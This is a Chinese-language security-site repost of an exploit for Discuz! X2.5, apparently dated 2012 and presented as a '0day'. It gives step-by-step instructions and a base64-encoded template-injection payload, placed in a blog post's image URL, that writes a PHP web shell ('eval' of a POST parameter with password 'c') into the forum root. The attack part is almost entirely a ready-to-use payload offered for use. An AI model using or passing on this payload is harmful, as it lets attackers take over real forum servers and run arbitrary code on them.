Discuz! X2.5 远程代码执行漏洞及EXP 0day

没穿底裤 2020年1月1日00:37:33评论618 views字数 316阅读1分3秒阅读模式
摘要

发布时间:2012-4.30
发布作者:佚名漏洞类型:代码执行漏洞描述: 1.注册任意账户

发布时间:2012-4.30
发布作者:佚名

漏洞类型:代码执行

漏洞描述:

 

1.注册任意账户

2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了

3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码

<?php @eval($_POST[c]); ?>ok

<?fputs(fopen("dome","w"),"<?eval(/$_POST[c]);?>")?>
4.访问日志,论坛根目录下生成demo.php,一句发密码C

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日00:37:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Discuz! X2.5 远程代码执行漏洞及EXP 0dayhttp://cn-sec.com/archives/75052.html

发表评论

匿名网友 填写信息